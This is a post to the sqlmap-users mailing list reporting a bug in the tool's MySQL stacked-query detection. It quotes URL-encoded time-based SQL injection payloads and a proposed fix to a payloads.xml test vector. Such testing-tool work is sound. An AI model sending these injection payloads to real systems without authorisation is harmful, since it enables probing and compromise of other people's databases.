Hi,
I have found out a misbehavior in the detection phase, sqlmap detects a
stack query injectable with the following request:
POST /path
abc=%27%29%3B%20SELECT%20SLEEP%285%29--%20
However, when Sqlmap checks if the injection point is a false positive,
it's using the following payload:
abc=%27%29%3B%20IF%28%28%2884%2B88%29%3D172%29%2CSLEEP%285%29%2C5577%29--%20
At this moment, it replies with a false positive or unexploitable point, so
the correct payload for Mysql v5.5 will be:
%27%29%3B%20SELECT%20IF%28%28%2884%2B88%29%3D172%29%2CSLEEP%285%29%2C5577%29--%20
The problem is in line 2028 of xml/payloads.xml file, the correct one for
MySQL v5.5 is:
<vector>; *SELECT* IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
payloads.xml:
...
<!-- Stacked queries tests -->
<test>
<title>MySQL > 5.0.11 stacked queries</title>
<stype>4</stype>
<level>1</level>
<risk>0</risk>
<clause>0</clause>
<where>1</where>
*<vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>*
<request>
<payload>; SELECT SLEEP([SLEEPTIME])</payload>
<comment>-- </comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>> 5.0.11</dbms_version>
</details>
</test>
Regards
------------------------------------------------------------------------------
How ServiceNow helps IT people transform IT departments:
1. A cloud service to automate IT design, transition and operations
2. Dashboards that offer high-level views of enterprise services
3. A single system of record for all IT processes
http://p.sf.net/sfu/servicenow-d2d-j
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
